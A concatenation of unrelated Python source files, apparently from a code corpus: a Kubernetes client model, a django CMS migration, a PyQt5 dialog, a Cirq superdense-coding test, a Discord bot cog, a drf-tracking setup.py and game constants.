readyReplicas is the number of Pods created by the StatefulSet controller that have a Ready Condition.
:return: The ready_replicas of this V1StatefulSetStatus.
:rtype: int
"""
return self._ready_replicas
@ready_replicas.setter
def ready_replicas(self, ready_replicas):
"""
Sets the ready_replicas of this V1StatefulSetStatus.
readyReplicas is the number of Pods created by the StatefulSet controller that have a Ready Condition.
:param ready_replicas: The ready_replicas of this V1StatefulSetStatus.
:type: int
"""
self._ready_replicas = ready_replicas
@property
def replicas(self):
"""
Gets the replicas of this V1StatefulSetStatus.
replicas is the number of Pods created by the StatefulSet controller.
:return: The replicas of this V1StatefulSetStatus.
:rtype: int
"""
return self._replicas
@replicas.setter
def replicas(self, replicas):
"""
Sets the replicas of this V1StatefulSetStatus.
replicas is the number of Pods created by the StatefulSet controller.
:param replicas: The replicas of this V1StatefulSetStatus.
:type: int
"""
if replicas is None:
raise ValueError("Invalid value for `replicas`, must not be `None`")
self._replicas = replicas
@property
def update_revision(self):
"""
Gets the update_revision of this V1StatefulSetStatus.
updateRevision, if not empty, indicates the version of the StatefulSet used to generate Pods in the sequence [replicas-updatedReplicas,replicas)
:return: The update_revision of this V1StatefulSetStatus.
:rtype: str
"""
return self._update_revision
@update_revision.setter
def update_revision(self, update_revision):
"""
Sets the update_revision of this V1StatefulSetStatus.
updateRevision, if not empty, indicates the version of the StatefulSet used to generate Pods in the sequence [replicas-updatedReplicas,replicas)
:param update_revision: The update_revision of this V1StatefulSetStatus.
:type: str
"""
self._update_revision = update_revision
@property
def updated_replicas(self):
"""
Gets the updated_replicas of this V1StatefulSetStatus.
updatedReplicas is the number of Pods created by the StatefulSet controller from the StatefulSet version indicated by updateRevision.
:return: The updated_replicas of this V1StatefulSetStatus.
:rtype: int
"""
return self._updated_replicas
@updated_replicas.setter
def updated_replicas(self, updated_replicas):
"""
Sets the updated_replicas of this V1StatefulSetStatus.
updatedReplicas is the number of Pods created by the StatefulSet controller from the StatefulSet version indicated by updateRevision.
:param updated_replicas: The updated_replicas of this V1StatefulSetStatus.
:type: int
"""
self._updated_replicas = updated_replicas
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1StatefulSetStatus):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
py | b414cc7dbcff1f4455b3eac4fcac1af5c2893cdd | # -*- coding: utf-8 -*-
# Copyright: (c) 2019, Jordan Borean (@jborean93) <[email protected]>
# MIT License (see LICENSE or https://opensource.org/licenses/MIT)
def to_bytes(value, encoding='utf-8'):
"""
Makes sure the value is encoded as a byte string.
:param value: The Python string value to encode.
:param encoding: The encoding to use.
:return: The byte string that was encoded.
"""
if isinstance(value, bytes):
return value
return value.encode(encoding)
def to_text(value, encoding='utf-8'):
"""
Makes sure the value is decoded as a text string.
:param value: The Python byte string value to decode.
:param encoding: The encoding to use.
:return: The text/unicode string that was decoded.
"""
if isinstance(value, str):
return value
return value.decode(encoding)
|
py | b414cd2fdc6c0242ef1ed35ecc6af72f908f6aae | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
try:
from django.contrib.auth import get_user_model
except ImportError: # django < 1.5
from django.contrib.auth.models import User
else:
User = get_user_model()
user_orm_label = '%s.%s' % (User._meta.app_label, User._meta.object_name)
user_model_label = '%s.%s' % (User._meta.app_label, User._meta.model_name)
user_ptr_name = '%s_ptr' % User._meta.object_name.lower()
class Migration(DataMigration):
def forwards(self, orm):
"Write your forwards methods here."
try:
ct = orm['contenttypes.ContentType'].objects.get(model='page', app_label='cms')
except orm['contenttypes.ContentType'].DoesNotExist:
ct = orm['contenttypes.ContentType'].objects.create(name='page', model='page', app_label='cms')
try:
perm = orm['auth.permission'].objects.get(codename='publish_page')
except orm['auth.permission'].DoesNotExist:
perm = orm['auth.permission'].objects.create(content_type=ct, codename='publish_page', name=u'Can publish Page')
def backwards(self, orm):
"Write your backwards methods here."
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
user_model_label: {
'Meta': {'object_name': User.__name__, 'db_table': "'%s'" % User._meta.db_table},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'cms.cmsplugin': {
'Meta': {'object_name': 'CMSPlugin'},
'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.CMSPlugin']", 'null': 'True', 'blank': 'True'}),
'placeholder': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'}),
'plugin_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'position': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.globalpagepermission': {
'Meta': {'object_name': 'GlobalPagePermission'},
'can_add': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change_advanced_settings': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_change_permissions': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_delete': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_move_page': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_publish': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_recover_page': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_view': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['%s']" % user_orm_label, 'null': 'True', 'blank': 'True'})
},
'cms.page': {
'Meta': {'ordering': "('tree_id', 'lft')", 'object_name': 'Page'},
'changed_by': ('django.db.models.fields.CharField', [], {'max_length': '70'}),
'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.CharField', [], {'max_length': '70'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_navigation': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'limit_visibility_in_menu': ('django.db.models.fields.SmallIntegerField', [], {'default': 'None', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'moderator_state': ('django.db.models.fields.SmallIntegerField', [], {'default': '0', 'blank': 'True'}),
'navigation_extenders': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '80', 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['cms.Page']"}),
'placeholders': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cms.Placeholder']", 'symmetrical': 'False'}),
'publication_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'publication_end_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'publisher_is_draft': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'publisher_public': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'publisher_draft'", 'unique': 'True', 'null': 'True', 'to': "orm['cms.Page']"}),
'publisher_state': ('django.db.models.fields.SmallIntegerField', [], {'default': '0', 'db_index': 'True'}),
'reverse_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '40', 'null': 'True', 'blank': 'True'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'soft_root': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'template': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.pagemoderatorstate': {
'Meta': {'ordering': "('page', 'action', '-created')", 'object_name': 'PageModeratorState'},
'action': ('django.db.models.fields.CharField', [], {'max_length': '3', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {'default': "''", 'max_length': '1000', 'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Page']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['%s']" % user_orm_label, 'null': 'True'})
},
'cms.pagepermission': {
'Meta': {'object_name': 'PagePermission'},
'can_add': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change_advanced_settings': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_change_permissions': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_delete': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_move_page': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_publish': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_view': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'grant_on': ('django.db.models.fields.IntegerField', [], {'default': '5'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Page']", 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['%s']" % user_orm_label, 'null': 'True', 'blank': 'True'})
},
'cms.pageuser': {
'Meta': {'object_name': 'PageUser', '_ormbases': [user_orm_label]},
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_users'", 'to': "orm['%s']" % user_orm_label}),
'user_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['%s']" % user_orm_label, 'unique': 'True', 'primary_key': 'True'})
},
'cms.pageusergroup': {
'Meta': {'object_name': 'PageUserGroup', '_ormbases': ['auth.Group']},
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_usergroups'", 'to': "orm['%s']" % user_orm_label}),
'group_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.Group']", 'unique': 'True', 'primary_key': 'True'})
},
'cms.placeholder': {
'Meta': {'object_name': 'Placeholder'},
'default_width': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slot': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
},
'cms.title': {
'Meta': {'unique_together': "(('language', 'page'),)", 'object_name': 'Title'},
'application_urls': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'null': 'True', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'has_url_overwrite': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
'menu_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'meta_description': ('django.db.models.fields.TextField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'meta_keywords': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'title_set'", 'to': "orm['cms.Page']"}),
'page_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'redirect': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['cms']
symmetrical = True
|
py | b414cd64fe162f7625440bc3d31f7121e22ec524 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'motif_ops.ui'
#
# Created by: PyQt5 UI code generator 5.15.1
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_efed(object):
def setupUi(self, efed):
efed.setObjectName("efed")
efed.setWindowModality(QtCore.Qt.ApplicationModal)
efed.resize(380, 241)
self.frame = QtWidgets.QFrame(efed)
self.frame.setGeometry(QtCore.QRect(0, 0, 381, 241))
self.frame.setStyleSheet("QFrame#frame{\n"
" border-radius:15px;\n"
" background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:1, stop:0.116919 rgba(0, 115, 173, 255), stop:0.944118 rgba(0, 0, 0, 255));\n"
" \n"
"}")
self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame.setObjectName("frame")
self.title_bar = QtWidgets.QFrame(self.frame)
self.title_bar.setGeometry(QtCore.QRect(-1, -1, 381, 41))
self.title_bar.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.title_bar.setFrameShadow(QtWidgets.QFrame.Raised)
self.title_bar.setObjectName("title_bar")
self.mini = QtWidgets.QPushButton(self.title_bar)
self.mini.setGeometry(QtCore.QRect(320, 10, 20, 20))
font = QtGui.QFont()
font.setPointSize(22)
font.setBold(True)
font.setWeight(75)
self.mini.setFont(font)
self.mini.setStyleSheet("QPushButton{\n"
" border:none;\n"
" border-radius:10px;\n"
" background-color: rgb(255, 170, 0);\n"
"}\n"
"\n"
"QPushButton:hover{\n"
" background-color: rgb(206, 137, 0);\n"
"}")
self.mini.setText("")
self.mini.setObjectName("mini")
self.label = QtWidgets.QLabel(self.title_bar)
self.label.setGeometry(QtCore.QRect(20, 10, 191, 31))
font = QtGui.QFont()
font.setFamily("Mongolian Baiti")
font.setPointSize(20)
font.setBold(True)
font.setItalic(False)
font.setUnderline(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setStyleSheet("color: rgb(255, 255, 255);")
self.label.setObjectName("label")
self.close_btn = QtWidgets.QPushButton(self.title_bar)
self.close_btn.setGeometry(QtCore.QRect(350, 10, 20, 20))
self.close_btn.setMinimumSize(QtCore.QSize(20, 20))
self.close_btn.setMaximumSize(QtCore.QSize(20, 20))
font = QtGui.QFont()
font.setPointSize(11)
font.setBold(True)
font.setWeight(75)
self.close_btn.setFont(font)
self.close_btn.setStyleSheet("QPushButton{\n"
" border:none;\n"
" border-radius:10px;\n"
" background-color: rgb(255, 0, 0);\n"
"}\n"
"\n"
"QPushButton:hover{\n"
" background-color: rgb(211, 0, 0);\n"
"}")
self.close_btn.setText("")
self.close_btn.setObjectName("close_btn")
self.label_3 = QtWidgets.QLabel(self.frame)
self.label_3.setGeometry(QtCore.QRect(100, 140, 191, 31))
font = QtGui.QFont()
font.setFamily("Mongolian Baiti")
font.setPointSize(11)
font.setBold(True)
font.setWeight(75)
self.label_3.setFont(font)
self.label_3.setStyleSheet("color: rgb(255, 85, 0);")
self.label_3.setText("")
self.label_3.setObjectName("label_3")
self.label_2 = QtWidgets.QLabel(self.frame)
self.label_2.setGeometry(QtCore.QRect(30, 70, 311, 41))
font = QtGui.QFont()
font.setFamily("Mongolian Baiti")
font.setPointSize(14)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
self.label_2.setFont(font)
self.label_2.setStyleSheet("color: rgb(255, 255, 255);")
self.label_2.setObjectName("label_2")
self.motif = QtWidgets.QTextEdit(self.frame)
self.motif.setGeometry(QtCore.QRect(33, 106, 331, 121))
font = QtGui.QFont()
font.setFamily("Mongolian Baiti")
font.setPointSize(14)
self.motif.setFont(font)
self.motif.setStyleSheet("background-color:transparent;\n"
"color: rgb(255, 255, 255);\n"
"border-bottom:1px solid rgb(255, 255, 255);\n"
"border-right:1px solid rgb(255, 255, 255);\n"
"border-radius:15px;\n"
"")
self.motif.setReadOnly(True)
self.motif.setObjectName("motif")
self.retranslateUi(efed)
QtCore.QMetaObject.connectSlotsByName(efed)
def retranslateUi(self, efed):
_translate = QtCore.QCoreApplication.translate
efed.setWindowTitle(_translate("efed", "efed"))
self.label.setText(_translate("efed", "REMARQUES"))
self.label_2.setText(_translate("efed", "Remarque d\'opération :"))
|
py | b414ce700713c92e47901993304bf2007f0ad994 | # ========================================================================
# Copyright (C) 2019 The MITRE Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ========================================================================
import vs_test_path_fixup
import unittest
import cirq
class SuperdenseCodingTests(unittest.TestCase):
"""
This class contains a simple implementation of the superdense coding protocol.
Note that unlike the other fundamental algorithms, this class uses a "circuit"
instance variable to represent the quantum circuit that holds the superdense coding
protocol. This is another example of Cirq's flexibility with respect to circuits
and registers.
"""
def setUp(self):
"""
        Initializes the unit test class.
"""
self.circuit = cirq.Circuit()
# ==============================
# == Algorithm Implementation ==
# ==============================
def encode_message(self, buffer, pair_a):
"""
Encodes two bits of information into an entangled qubit.
Parameters:
buffer (list[bool]): The two bits to encode into the qubit.
pair_a (Qid): The qubit to encode the information into. This
qubit must have already been entangled with another one.
"""
        # Superdense coding takes advantage of the fact that if you start with |00> + |11>,
# you can modify it with X and Z on one qubit in a way that will affect both
# qubits.
        # Nothing, X, Z, and XZ will all produce discrete, measurable states when
# both qubits are disentangled.
# We're going to use this lookup table to encode the given bits into the qubit
# pair:
# 00 = |00> + |11> (nothing happens)
# 01 = |01> + |10> (X, the parity is flipped)
# 10 = |00> - |11> (Z, the phase is flipped)
# 11 = |01> - |10> (XZ, parity and phase are flipped)
if(buffer[1]):
self.circuit.append(cirq.X(pair_a)) # X if the low bit is 1
if(buffer[0]):
self.circuit.append(cirq.Z(pair_a)) # Z if the high bit is 1
def decode_message(self, pair_a, pair_b):
"""
Decodes two bits of information from an entangled pair of qubits.
Parameters:
pair_a (Qid): The "remote" qubit that was modified by the encoding
process.
pair_b (Qid): The "local" qubit that we received, which wasn't
directly modified.
Returns:
a_measurement_key (str): The key of the measurement of the "remote" qubit.
b_measurement_key (str): The key of the measurement of the "local" qubit.
"""
a_measurement_key = "a_measurement"
b_measurement_key = "b_measurement"
self.circuit.append([
cirq.CNOT(pair_a, pair_b),
cirq.H(pair_a)
])
# Here's the decoding table based on the states after running
# them through CNOT(A, B) and H(A):
# |00> + |11> => |00> + |10> => |00>, so 00 means nothing happened
# |01> + |10> => |01> + |11> => |01>, so 01 means X happened
# |00> - |11> => |00> - |10> => |10>, so 10 means Z happened
# |01> - |10> => |01> - |11> => |11>, so 11 means XZ happened
# Notice how all 4 options align with the bit string used by the encoding
# table, so measuring these qubits gives us the original bits where
# pair_b corresponds to whether or not X was used, and pair_a corresponds
# to Z.
self.circuit.append([
cirq.measure(pair_a, key=a_measurement_key),
cirq.measure(pair_b, key=b_measurement_key),
])
return (a_measurement_key, b_measurement_key)
# ====================
# == Test Case Code ==
# ====================
def run_test(self, description, iterations, buffer):
"""
Runs the superdense coding algorithm on the given classical buffer.
Parameters:
description (str): A description of the test, for logging.
iterations (int): The number of times to run the circuit.
buffer (list[Bool]): The buffer containing the two bits to send.
"""
# Construct the registers and circuit.
print(f"Running test: {description}")
pair_a = cirq.NamedQubit(name="pair_a")
pair_b = cirq.NamedQubit(name="pair_b")
# Entangle the qubits together
self.circuit.append([
cirq.H(pair_a),
cirq.CNOT(pair_a, pair_b)
])
# Encode the buffer into the qubits, then decode them into classical measurements
self.encode_message(buffer, pair_a)
(a_measurement_key, b_measurement_key) = self.decode_message(pair_a, pair_b)
# Run the circuit N times.
simulator = cirq.Simulator()
result = simulator.run(self.circuit, repetitions=iterations)
# Check the first qubit to make sure it was always the expected value
desired_a_state = int(buffer[0])
a_result = result.histogram(key=a_measurement_key)
correct_a_counts = a_result[desired_a_state]
if correct_a_counts != iterations:
self.fail(f"Test {description} failed. The first bit should have been {desired_a_state} all " +
f"{iterations} times but it was only in this state {correct_a_counts} times.")
else:
print(f"The first qubit was {desired_a_state} all {iterations} times.")
# Check the second qubit to make sure it was always the expected value
desired_b_state = int(buffer[1])
b_result = result.histogram(key=b_measurement_key)
correct_b_counts = b_result[desired_b_state]
if correct_b_counts != iterations:
self.fail(f"Test {description} failed. The second bit should have been {desired_b_state} all " +
f"{iterations} times but it was only in this state {correct_b_counts} times.")
else:
print(f"The second qubit was {desired_b_state} all {iterations} times.")
print("Passed!")
print()
def test_00(self):
"""
Runs the superdense coding test on [00].
"""
self.run_test("Superdense [00]", 100, [False, False])
def test_01(self):
"""
Runs the superdense coding test on [01].
"""
self.run_test("Superdense [01]", 100, [False, True])
def test_10(self):
"""
Runs the superdense coding test on [10].
"""
self.run_test("Superdense [10]", 100, [True, False])
def test_11(self):
"""
Runs the superdense coding test on [11].
"""
self.run_test("Superdense [11]", 100, [True, True])
if __name__ == '__main__':
unittest.main()
|
py | b414cf92f696f6586e443d661d1510c33bc88e2e | import discord
from discord.ext import commands
class Util(commands.Cog):
def __init__(self, client):
self.client = client
@commands.command()
async def ping(self, ctx):
await ctx.send(f'📶 {round(self.client.latency*1000)}ms')
@commands.command()
async def help(self, ctx):
embed = discord.Embed(title = "Commands List", colour = discord.Color.lighter_gray(), timestamp=ctx.message.created_at)
embed.set_footer(text=f'Requested by {ctx.author}', icon_url=ctx.author.avatar_url)
embed.add_field(name="Moderation 🔒", value=".clear [amount]\tor .c\n.mute @mention\n.unmute @mention\n.kick @mention\n.ban @mention\n.unban [name#tag]\n - ")
#embed.add_field(name="_", value="_", inline=False)
embed.add_field(name="Utility ⚙️", value='.ping\n.poll [text]\n.info @mention\n.id @mention\n.membercount\n - ')
embed.add_field(name="Fun 🎉",value='.bong\tpurge bongs\n.say [text]\n.quote [text]\n.ask [text]\n.who\n.coin\n.enter\n.exit (to exit the chats in style)\n.wtc (watch the 9/11 incident)\n.hoe\n.nyan\n.ok\n.cry\n.pankaj\n.bruh\n',inline=False)
embed.set_footer(text="This bot is still under development 😤")
await ctx.send(embed=embed)
#@commands.command()
#async def usercount(self, ctx):
# await ctx.send(len(ctx.guild.members))
@commands.command()
async def membercount(self,ctx):
await ctx.send(ctx.guild.member_count)
def setup(client):
client.add_cog(Util(client)) |
py | b414d076c05e535e8e25015ca5131cd131145188 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
import os
import sys
from setuptools import setup
name = 'drf-tracking'
package = 'rest_framework_tracking'
description = 'Utils to log Django Rest Framework requests to the database'
url = 'https://github.com/aschn/drf-tracking'
author = 'Anna Schneider'
author_email = '[email protected]'
license = 'BSD'
def get_version(package):
"""
    Return package version as listed in `__version__` in `__init__.py`.
"""
init_py = open(os.path.join(package, '__init__.py')).read()
return re.search("^__version__ = ['\"]([^'\"]+)['\"]",
init_py, re.MULTILINE).group(1)
def get_packages(package):
"""
Return root package and all sub-packages.
"""
return [dirpath
for dirpath, dirnames, filenames in os.walk(package)
if os.path.exists(os.path.join(dirpath, '__init__.py'))]
def get_package_data(package):
"""
Return all files under the root package, that are not in a
package themselves.
"""
walk = [(dirpath.replace(package + os.sep, '', 1), filenames)
for dirpath, dirnames, filenames in os.walk(package)
if not os.path.exists(os.path.join(dirpath, '__init__.py'))]
filepaths = []
for base, filenames in walk:
filepaths.extend([os.path.join(base, filename)
for filename in filenames])
return {package: filepaths}
version = get_version(package)
if sys.argv[-1] == 'publish':
if os.system("pip freeze | grep wheel"):
print("wheel not installed.\nUse `pip install wheel`.\nExiting.")
sys.exit()
os.system("python setup.py sdist upload")
os.system("python setup.py bdist_wheel upload")
print("You probably want to also tag the version now:")
print(" git tag -a {0} -m 'version {0}'".format(version))
print(" git push --tags")
sys.exit()
setup(
name=name,
version=version,
url=url,
license=license,
description=description,
author=author,
author_email=author_email,
packages=get_packages(package),
package_data=get_package_data(package),
install_requires=[
'Django>=1.7',
'djangorestframework>=3'
],
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'Framework :: Django :: 1.7',
'Framework :: Django :: 1.8',
'Framework :: Django :: 1.9',
'Framework :: Django :: 1.10',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Natural Language :: English',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Internet :: WWW/HTTP',
]
)
|
py | b414d0caaea97f58fb059385951bdaf0eba18731 | # Game Constants
screen_width = 1280
screen_height = 720
font_size = screen_width / 40
screen_font = "assets/fonts/aerial.ttf"
max_player_life = 5
max_enemy_spawn_interval = 5.0 # in seconds
